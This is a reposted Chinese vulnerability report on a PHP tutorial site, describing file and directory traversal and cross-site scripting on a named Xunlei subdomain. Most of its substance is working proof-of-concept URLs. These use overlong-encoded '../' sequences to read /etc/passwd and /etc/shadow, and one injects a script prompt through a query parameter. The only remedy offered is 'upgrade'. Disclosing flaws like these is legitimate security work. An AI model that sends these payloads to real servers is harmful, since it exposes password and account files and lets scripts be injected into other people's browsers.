网站地图    收藏   

主页 > 后端 > 网站安全 >

迅雷分站任意文件/目录遍历下载及修复方案 - 网

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 简要描述:连root密码文件都可读,还有几个xss详细说明:漏洞证明:http://union.xunlei.com:80/center//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%......

 

简要描述:

连root密码文件都可读,还有几个xss

详细说明:

漏洞证明:

 

http://union.xunlei.com:80/center//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

 

http://union.xunlei.com:80/center//%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shadow www.2cto.com

 

http://union.xunlei.com:80/center/union/helpcontent1.jsf?fathertitle=1%3cScRiPt%20%3eprompt%28972193%29%3c%2fScRiPt%3e&seqid=169

修复方案:

升级吧

作者:阿门

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论